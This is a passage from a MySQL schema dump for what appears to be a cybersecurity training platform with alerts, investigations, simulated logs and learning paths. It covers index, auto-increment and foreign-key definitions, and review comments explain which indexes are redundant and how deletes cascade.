  ADD PRIMARY KEY (`id`),
  ADD KEY `operation_id` (`operation_id`),
  ADD KEY `alert_id` (`alert_id`);

--
-- Indexes for table `organizations`
--
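-- Review: the dump carried both UNIQUE KEY `slug` and a plain KEY
-- `idx_org_slug` on the same single column. The unique index already serves
-- equality lookups on `slug`, so the plain one only duplicated write cost and
-- storage; it is dropped here. `idx_org_owner` (per-owner listing) is kept.
ALTER TABLE `organizations`
  ADD PRIMARY KEY (`id`),
  ADD UNIQUE KEY `slug` (`slug`),
  ADD KEY `idx_org_owner` (`owner_id`);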

--
-- Indexes for table `organization_invites`
--
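-- Review: the dump carried both UNIQUE KEY `token` and a plain KEY
-- `idx_invite_token` on the same column. The unique index already serves the
-- token lookup and, being unique, guarantees an invite token resolves to at
-- most one row, so the duplicate index is dropped. The `organization_id` and
-- `invited_by` keys (shaped as foreign-key support indexes; the constraints
-- themselves, if any, are declared outside this section) and
-- `idx_invite_email` are kept.
ALTER TABLE `organization_invites`
  ADD PRIMARY KEY (`id`),
  ADD UNIQUE KEY `token` (`token`),
  ADD KEY `organization_id` (`organization_id`),
  ADD KEY `invited_by` (`invited_by`),
  ADD KEY `idx_invite_email` (`email`);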

--
-- Indexes for table `organization_members`
--
-- One membership row per (organization, user), enforced by `unique_org_user`.
-- NOTE(review): `idx_member_org` (`organization_id`) is the left-most prefix of
-- `unique_org_user` (`organization_id`,`user_id`) and is therefore redundant;
-- it can be dropped once no index hint elsewhere names it.
ALTER TABLE `organization_members`
  ADD PRIMARY KEY (`id`),
  ADD UNIQUE KEY `unique_org_user` (`organization_id`,`user_id`),
  ADD KEY `invited_by` (`invited_by`),
  ADD KEY `idx_member_org` (`organization_id`),
  ADD KEY `idx_member_user` (`user_id`);

--
-- Indexes for table `password_resets`
--
-- Only the surrogate key is declared here; the table's columns are outside
-- this chunk, so whether reset lookups (by token or user) are indexed cannot be
-- confirmed from this section.
ALTER TABLE `password_resets`
  ADD PRIMARY KEY (`id`);

--
-- Indexes for table `simulated_logs`
--
-- Indexes for the log-search workload over the simulated log store: time-range
-- scans on `timestamp`, pivots on source/destination IP, and selection by
-- `index_name`.
ALTER TABLE `simulated_logs`
  ADD PRIMARY KEY (`id`),
  ADD KEY `idx_timestamp` (`timestamp`),
  ADD KEY `idx_source_ip` (`source_ip`),
  ADD KEY `idx_dest_ip` (`dest_ip`),
  ADD KEY `idx_index_name` (`index_name`);

--
-- Indexes for table `student_domains`
--
-- Each allow-listed domain appears once.
ALTER TABLE `student_domains`
  ADD PRIMARY KEY (`id`),
  ADD UNIQUE KEY `domain` (`domain`);

--
-- Indexes for table `system_settings`
--
-- Natural key on the setting name. `key` is a reserved word and must stay
-- backquoted wherever it is referenced.
ALTER TABLE `system_settings`
  ADD PRIMARY KEY (`key`);

--
-- Indexes for table `tasks`
--
-- `idx_tasks_module` lists a module's tasks; `fk_task_alert` is named like a
-- foreign-key support index on `alert_id`, but the constraint itself (if any)
-- is declared outside this section.
ALTER TABLE `tasks`
  ADD PRIMARY KEY (`id`),
  ADD KEY `idx_tasks_module` (`module_id`),
  ADD KEY `fk_task_alert` (`alert_id`);

--
-- Indexes for table `users`
--
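-- Review: the dump carried 62 UNIQUE KEYs on `username` (`username`,
-- `username_2` ... `username_62`) -- the same constraint re-added, most likely
-- by a migration that was re-run without checking whether the index already
-- existed. A single UNIQUE index enforces exactly the same rule; each duplicate
-- only added write amplification and storage on every user insert/update.
-- Only the first is kept here. `email` uniqueness is unchanged.
ALTER TABLE `users`
  ADD PRIMARY KEY (`id`),
  ADD UNIQUE KEY `email` (`email`),
  ADD UNIQUE KEY `username` (`username`);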

--
-- Indexes for table `user_alert_assignments`
--
-- A user gets a given alert at most once per day (`unique_user_alert_date`).
-- `idx_user_date` is not redundant with it: its second column is
-- `assigned_date`, which the unique key only covers after `alert_id`.
ALTER TABLE `user_alert_assignments`
  ADD PRIMARY KEY (`id`),
  ADD UNIQUE KEY `unique_user_alert_date` (`user_id`,`alert_id`,`assigned_date`),
  ADD KEY `idx_user_date` (`user_id`,`assigned_date`);

--
-- Indexes for table `user_badges`
--
-- A badge is awarded to a user at most once (`unique_user_badge`).
-- NOTE(review): `idx_user_badges_user` (`user_id`) is the left-most prefix of
-- `unique_user_badge` (`user_id`,`badge_id`) and is therefore redundant; it can
-- be dropped once no index hint elsewhere names it.
ALTER TABLE `user_badges`
  ADD PRIMARY KEY (`id`),
  ADD UNIQUE KEY `unique_user_badge` (`user_id`,`badge_id`),
  ADD KEY `badge_id` (`badge_id`),
  ADD KEY `idx_user_badges_user` (`user_id`);

--
-- Indexes for table `user_lesson_answers`
--
-- One stored answer per (user, question); `question_id` alone is indexed for
-- per-question queries.
ALTER TABLE `user_lesson_answers`
  ADD PRIMARY KEY (`id`),
  ADD UNIQUE KEY `unique_user_question` (`user_id`,`question_id`),
  ADD KEY `question_id` (`question_id`);

--
-- Indexes for table `user_lesson_grades`
--
-- One grade per (user, task); `task_id` alone is indexed for per-task queries.
ALTER TABLE `user_lesson_grades`
  ADD PRIMARY KEY (`id`),
  ADD UNIQUE KEY `unique_user_task_grade` (`user_id`,`task_id`),
  ADD KEY `task_id` (`task_id`);

--
-- Indexes for table `user_operation_progress`
--
-- Per-user and per-operation lookups; the pair is not declared unique here.
ALTER TABLE `user_operation_progress`
  ADD PRIMARY KEY (`id`),
  ADD KEY `user_id` (`user_id`),
  ADD KEY `operation_id` (`operation_id`);

--
-- Indexes for table `user_path_progress`
--
-- One progress row per (user, learning path).
-- NOTE(review): `idx_user_path_user` (`user_id`) is the left-most prefix of
-- `unique_user_path` (`user_id`,`learning_path_id`) and is therefore redundant;
-- it can be dropped once no index hint elsewhere names it.
ALTER TABLE `user_path_progress`
  ADD PRIMARY KEY (`id`),
  ADD UNIQUE KEY `unique_user_path` (`user_id`,`learning_path_id`),
  ADD KEY `learning_path_id` (`learning_path_id`),
  ADD KEY `current_module_id` (`current_module_id`),
  ADD KEY `idx_user_path_user` (`user_id`);

--
-- Indexes for table `user_path_specialization`
--
-- One specialization row per (user, path code). The unique key name
-- `unique_user_path` is reused from `user_path_progress`; that is legal because
-- index names are scoped per table, but it makes error messages ambiguous.
ALTER TABLE `user_path_specialization`
  ADD PRIMARY KEY (`id`),
  ADD UNIQUE KEY `unique_user_path` (`user_id`,`path_code`);

--
-- Indexes for table `user_task_progress`
--
-- One progress row per (user, task).
-- NOTE(review): `idx_user_progress_user` (`user_id`) is the left-most prefix of
-- `unique_user_task` (`user_id`,`task_id`) and is therefore redundant; it can be
-- dropped once no index hint elsewhere names it. `idx_user_progress_task` is
-- needed for the per-task direction.
ALTER TABLE `user_task_progress`
  ADD PRIMARY KEY (`id`),
  ADD UNIQUE KEY `unique_user_task` (`user_id`,`task_id`),
  ADD KEY `idx_user_progress_user` (`user_id`),
  ADD KEY `idx_user_progress_task` (`task_id`);

--
-- Indexes for table `user_xp`
--
-- `user_id` is the natural key: exactly one XP record per user. No foreign key
-- to `users` is declared in this section.
ALTER TABLE `user_xp`
  ADD PRIMARY KEY (`user_id`);

--
-- AUTO_INCREMENT for dumped tables
--

--
-- AUTO_INCREMENT for table `alerts`
--
-- NOTE(review): the `MODIFY ... AUTO_INCREMENT` statements in this section
-- come in two shapes. Those carrying an explicit `AUTO_INCREMENT=n` pin the
-- next id to the value the source server held at dump time. Those without one
-- leave the counter to the storage engine; for InnoDB the counter resumes
-- from the largest `id` already loaded, so ids are not re-issued after a
-- restore. Whether the tables without a value were empty at dump time or the
-- counter simply was not exported cannot be told from here. The explicit
-- values are also a rough indicator of row volume on the source database;
-- keep that in mind before sharing the dump outside the team.
ALTER TABLE `alerts`
  MODIFY `id` int(11) NOT NULL AUTO_INCREMENT;

--
-- AUTO_INCREMENT for table `alert_grades`
--
ALTER TABLE `alert_grades`
  MODIFY `id` int(11) NOT NULL AUTO_INCREMENT;

--
-- AUTO_INCREMENT for table `badges`
--
ALTER TABLE `badges`
  MODIFY `id` int(11) NOT NULL AUTO_INCREMENT;

--
-- AUTO_INCREMENT for table `beta_signups`
--
ALTER TABLE `beta_signups`
  MODIFY `id` int(11) NOT NULL AUTO_INCREMENT, AUTO_INCREMENT=4;

--
-- AUTO_INCREMENT for table `blog_posts`
--
ALTER TABLE `blog_posts`
  MODIFY `id` int(11) NOT NULL AUTO_INCREMENT, AUTO_INCREMENT=197;

--
-- AUTO_INCREMENT for table `email_logs`
--
ALTER TABLE `email_logs`
  MODIFY `id` int(11) NOT NULL AUTO_INCREMENT, AUTO_INCREMENT=16;

--
-- AUTO_INCREMENT for table `feedbacks`
--
ALTER TABLE `feedbacks`
  MODIFY `id` int(11) NOT NULL AUTO_INCREMENT;

--
-- AUTO_INCREMENT for table `investigations`
--
ALTER TABLE `investigations`
  MODIFY `id` int(11) NOT NULL AUTO_INCREMENT, AUTO_INCREMENT=608;

--
-- AUTO_INCREMENT for table `investigation_notes`
--
ALTER TABLE `investigation_notes`
  MODIFY `id` int(11) NOT NULL AUTO_INCREMENT;

--
-- AUTO_INCREMENT for table `learning_paths`
--
ALTER TABLE `learning_paths`
  MODIFY `id` int(11) NOT NULL AUTO_INCREMENT, AUTO_INCREMENT=13;

--
-- AUTO_INCREMENT for table `lesson_content`
--
ALTER TABLE `lesson_content`
  MODIFY `id` int(11) NOT NULL AUTO_INCREMENT, AUTO_INCREMENT=1039;

--
-- AUTO_INCREMENT for table `lesson_questions`
--
ALTER TABLE `lesson_questions`
  MODIFY `id` int(11) NOT NULL AUTO_INCREMENT;

--
-- AUTO_INCREMENT for table `mobile_lesson_completions`
--
ALTER TABLE `mobile_lesson_completions`
  MODIFY `id` int(11) NOT NULL AUTO_INCREMENT, AUTO_INCREMENT=117;

--
-- AUTO_INCREMENT for table `modules`
--
ALTER TABLE `modules`
  MODIFY `id` int(11) NOT NULL AUTO_INCREMENT, AUTO_INCREMENT=135;

--
-- AUTO_INCREMENT for table `newsletter_subscribers`
--
ALTER TABLE `newsletter_subscribers`
  MODIFY `id` int(11) NOT NULL AUTO_INCREMENT, AUTO_INCREMENT=3;

--
-- AUTO_INCREMENT for table `notifications`
--
ALTER TABLE `notifications`
  MODIFY `id` int(11) NOT NULL AUTO_INCREMENT;

--
-- AUTO_INCREMENT for table `operations`
--
ALTER TABLE `operations`
  MODIFY `id` int(11) NOT NULL AUTO_INCREMENT;

--
-- AUTO_INCREMENT for table `operation_alerts`
--
ALTER TABLE `operation_alerts`
  MODIFY `id` int(11) NOT NULL AUTO_INCREMENT, AUTO_INCREMENT=970;

--
-- AUTO_INCREMENT for table `organizations`
--
ALTER TABLE `organizations`
  MODIFY `id` int(11) NOT NULL AUTO_INCREMENT;

--
-- AUTO_INCREMENT for table `organization_invites`
--
ALTER TABLE `organization_invites`
  MODIFY `id` int(11) NOT NULL AUTO_INCREMENT;

--
-- AUTO_INCREMENT for table `organization_members`
--
ALTER TABLE `organization_members`
  MODIFY `id` int(11) NOT NULL AUTO_INCREMENT;

--
-- AUTO_INCREMENT for table `password_resets`
--
ALTER TABLE `password_resets`
  MODIFY `id` int(11) NOT NULL AUTO_INCREMENT;

--
-- AUTO_INCREMENT for table `simulated_logs`
--
ALTER TABLE `simulated_logs`
  MODIFY `id` int(11) NOT NULL AUTO_INCREMENT, AUTO_INCREMENT=21;

--
-- AUTO_INCREMENT for table `student_domains`
--
ALTER TABLE `student_domains`
  MODIFY `id` int(11) NOT NULL AUTO_INCREMENT, AUTO_INCREMENT=2;

--
-- AUTO_INCREMENT for table `tasks`
--
ALTER TABLE `tasks`
  MODIFY `id` int(11) NOT NULL AUTO_INCREMENT;

--
-- AUTO_INCREMENT for table `users`
--
ALTER TABLE `users`
  MODIFY `id` int(11) NOT NULL AUTO_INCREMENT;

--
-- AUTO_INCREMENT for table `user_alert_assignments`
--
ALTER TABLE `user_alert_assignments`
  MODIFY `id` int(11) NOT NULL AUTO_INCREMENT, AUTO_INCREMENT=1821;

--
-- AUTO_INCREMENT for table `user_badges`
--
ALTER TABLE `user_badges`
  MODIFY `id` int(11) NOT NULL AUTO_INCREMENT, AUTO_INCREMENT=32;

--
-- AUTO_INCREMENT for table `user_lesson_answers`
--
ALTER TABLE `user_lesson_answers`
  MODIFY `id` int(11) NOT NULL AUTO_INCREMENT, AUTO_INCREMENT=655;

--
-- AUTO_INCREMENT for table `user_lesson_grades`
--
ALTER TABLE `user_lesson_grades`
  MODIFY `id` int(11) NOT NULL AUTO_INCREMENT, AUTO_INCREMENT=210;

--
-- AUTO_INCREMENT for table `user_operation_progress`
--
ALTER TABLE `user_operation_progress`
  MODIFY `id` int(11) NOT NULL AUTO_INCREMENT, AUTO_INCREMENT=391;

--
-- AUTO_INCREMENT for table `user_path_progress`
--
ALTER TABLE `user_path_progress`
  MODIFY `id` int(11) NOT NULL AUTO_INCREMENT, AUTO_INCREMENT=400;

--
-- AUTO_INCREMENT for table `user_path_specialization`
--
ALTER TABLE `user_path_specialization`
  MODIFY `id` int(11) NOT NULL AUTO_INCREMENT;

--
-- AUTO_INCREMENT for table `user_task_progress`
--
ALTER TABLE `user_task_progress`
  MODIFY `id` int(11) NOT NULL AUTO_INCREMENT, AUTO_INCREMENT=210;

--
-- Constraints for dumped tables
--

--
-- Constraints for table `investigations`
--
-- investigations: owned by a user and tied to an alert; both parents cascade,
-- so deleting an alert also discards every investigation written against it
-- (contrast tasks.alert_id, which is detached with SET NULL instead).
ALTER TABLE `investigations`
  ADD CONSTRAINT `investigations_ibfk_1`
    FOREIGN KEY (`user_id`) REFERENCES `users` (`id`)
    ON DELETE CASCADE ON UPDATE RESTRICT;
ALTER TABLE `investigations`
  ADD CONSTRAINT `investigations_ibfk_2`
    FOREIGN KEY (`alert_id`) REFERENCES `alerts` (`id`)
    ON DELETE CASCADE ON UPDATE RESTRICT;

--
-- Constraints for table `investigation_notes`
--
-- investigation_notes: removed together with their author or their alert.
-- The constraint names (`notes_ibfk_*`) do not follow the `<table>_ibfk_n`
-- pattern used elsewhere in this dump — presumably the table was renamed at
-- some point; they are kept as-is because migrations may reference them.
ALTER TABLE `investigation_notes`
  ADD CONSTRAINT `notes_ibfk_1`
    FOREIGN KEY (`user_id`) REFERENCES `users` (`id`)
    ON DELETE CASCADE ON UPDATE RESTRICT;
ALTER TABLE `investigation_notes`
  ADD CONSTRAINT `notes_ibfk_2`
    FOREIGN KEY (`alert_id`) REFERENCES `alerts` (`id`)
    ON DELETE CASCADE ON UPDATE RESTRICT;

--
-- Constraints for table `lesson_content`
--
-- lesson_content: belongs to a task and is removed with it.
ALTER TABLE `lesson_content`
  ADD CONSTRAINT `lesson_content_ibfk_1`
    FOREIGN KEY (`task_id`) REFERENCES `tasks` (`id`)
    ON DELETE CASCADE ON UPDATE RESTRICT;

--
-- Constraints for table `lesson_questions`
--
-- lesson_questions: belongs to a task and is removed with it (which in turn
-- cascades into user_lesson_answers via that table's question_id FK).
ALTER TABLE `lesson_questions`
  ADD CONSTRAINT `lesson_questions_ibfk_1`
    FOREIGN KEY (`task_id`) REFERENCES `tasks` (`id`)
    ON DELETE CASCADE ON UPDATE RESTRICT;

--
-- Constraints for table `modules`
--
-- modules: removed with their learning path. The prerequisite link is a
-- self-reference that is detached (SET NULL) rather than cascaded, so deleting
-- one module never deletes the modules that depended on it.
ALTER TABLE `modules`
  ADD CONSTRAINT `modules_ibfk_1`
    FOREIGN KEY (`learning_path_id`) REFERENCES `learning_paths` (`id`)
    ON DELETE CASCADE ON UPDATE RESTRICT;
ALTER TABLE `modules`
  ADD CONSTRAINT `modules_ibfk_2`
    FOREIGN KEY (`prerequisite_module_id`) REFERENCES `modules` (`id`)
    ON DELETE SET NULL ON UPDATE RESTRICT;

--
-- Constraints for table `tasks`
--
-- tasks: removed with their module; a task merely loses its alert reference
-- (SET NULL) when the alert is deleted, so the lesson itself survives.
ALTER TABLE `tasks`
  ADD CONSTRAINT `fk_task_alert`
    FOREIGN KEY (`alert_id`) REFERENCES `alerts` (`id`)
    ON DELETE SET NULL ON UPDATE RESTRICT;
ALTER TABLE `tasks`
  ADD CONSTRAINT `tasks_ibfk_1`
    FOREIGN KEY (`module_id`) REFERENCES `modules` (`id`)
    ON DELETE CASCADE ON UPDATE RESTRICT;

--
-- Constraints for table `user_badges`
--
-- user_badges: award rows disappear with either the user or the badge.
ALTER TABLE `user_badges`
  ADD CONSTRAINT `user_badges_ibfk_1`
    FOREIGN KEY (`user_id`) REFERENCES `users` (`id`)
    ON DELETE CASCADE ON UPDATE RESTRICT;
ALTER TABLE `user_badges`
  ADD CONSTRAINT `user_badges_ibfk_2`
    FOREIGN KEY (`badge_id`) REFERENCES `badges` (`id`)
    ON DELETE CASCADE ON UPDATE RESTRICT;

--
-- Constraints for table `user_lesson_answers`
--
-- user_lesson_answers: removed with the answering user or with the question.
ALTER TABLE `user_lesson_answers`
  ADD CONSTRAINT `user_lesson_answers_ibfk_1`
    FOREIGN KEY (`user_id`) REFERENCES `users` (`id`)
    ON DELETE CASCADE ON UPDATE RESTRICT;
ALTER TABLE `user_lesson_answers`
  ADD CONSTRAINT `user_lesson_answers_ibfk_2`
    FOREIGN KEY (`question_id`) REFERENCES `lesson_questions` (`id`)
    ON DELETE CASCADE ON UPDATE RESTRICT;

--
-- Constraints for table `user_lesson_grades`
--
-- user_lesson_grades: removed with the graded user or with the task.
ALTER TABLE `user_lesson_grades`
  ADD CONSTRAINT `user_lesson_grades_ibfk_1`
    FOREIGN KEY (`user_id`) REFERENCES `users` (`id`)
    ON DELETE CASCADE ON UPDATE RESTRICT;
ALTER TABLE `user_lesson_grades`
  ADD CONSTRAINT `user_lesson_grades_ibfk_2`
    FOREIGN KEY (`task_id`) REFERENCES `tasks` (`id`)
    ON DELETE CASCADE ON UPDATE RESTRICT;

--
-- Constraints for table `user_path_progress`
--
-- user_path_progress: removed with the user or the learning path; when the
-- module currently being worked on is deleted the pointer is cleared
-- (SET NULL) and the progress row itself is kept.
ALTER TABLE `user_path_progress`
  ADD CONSTRAINT `user_path_progress_ibfk_1`
    FOREIGN KEY (`user_id`) REFERENCES `users` (`id`)
    ON DELETE CASCADE ON UPDATE RESTRICT;
ALTER TABLE `user_path_progress`
  ADD CONSTRAINT `user_path_progress_ibfk_2`
    FOREIGN KEY (`learning_path_id`) REFERENCES `learning_paths` (`id`)
    ON DELETE CASCADE ON UPDATE RESTRICT;
ALTER TABLE `user_path_progress`
  ADD CONSTRAINT `user_path_progress_ibfk_3`
    FOREIGN KEY (`current_module_id`) REFERENCES `modules` (`id`)
    ON DELETE SET NULL ON UPDATE RESTRICT;

--
-- Constraints for table `user_task_progress`
--
-- user_task_progress: removed with the user or with the task.
ALTER TABLE `user_task_progress`
  ADD CONSTRAINT `user_task_progress_ibfk_1`
    FOREIGN KEY (`user_id`) REFERENCES `users` (`id`)
    ON DELETE CASCADE ON UPDATE RESTRICT;
ALTER TABLE `user_task_progress`
  ADD CONSTRAINT `user_task_progress_ibfk_2`
    FOREIGN KEY (`task_id`) REFERENCES `tasks` (`id`)
    ON DELETE CASCADE ON UPDATE RESTRICT;

--
-- Constraints for table `user_xp`
--
-- user_xp: removed with its user.
ALTER TABLE `user_xp`
  ADD CONSTRAINT `user_xp_ibfk_1`
    FOREIGN KEY (`user_id`) REFERENCES `users` (`id`)
    ON DELETE CASCADE ON UPDATE RESTRICT;
-- Ends the dump's transaction. Note that on MySQL/MariaDB every CREATE TABLE
-- and ALTER TABLE above commits implicitly, so the import is not atomic: a
-- statement that fails midway leaves the schema partially applied and has to
-- be cleaned up by hand before the import is re-run.
COMMIT WORK;

-- Restore the client/results character sets and the connection collation from
-- the @OLD_* session variables the dump saved earlier. The `/*!40101 ... */`
-- form is a MySQL/MariaDB conditional comment: servers at version 4.1.1 or
-- newer execute the enclosed statement, any other SQL parser treats it as an
-- ordinary comment.
/*!40101 SET CHARACTER_SET_CLIENT=@OLD_CHARACTER_SET_CLIENT */;
/*!40101 SET CHARACTER_SET_RESULTS=@OLD_CHARACTER_SET_RESULTS */;
/*!40101 SET COLLATION_CONNECTION=@OLD_COLLATION_CONNECTION */;
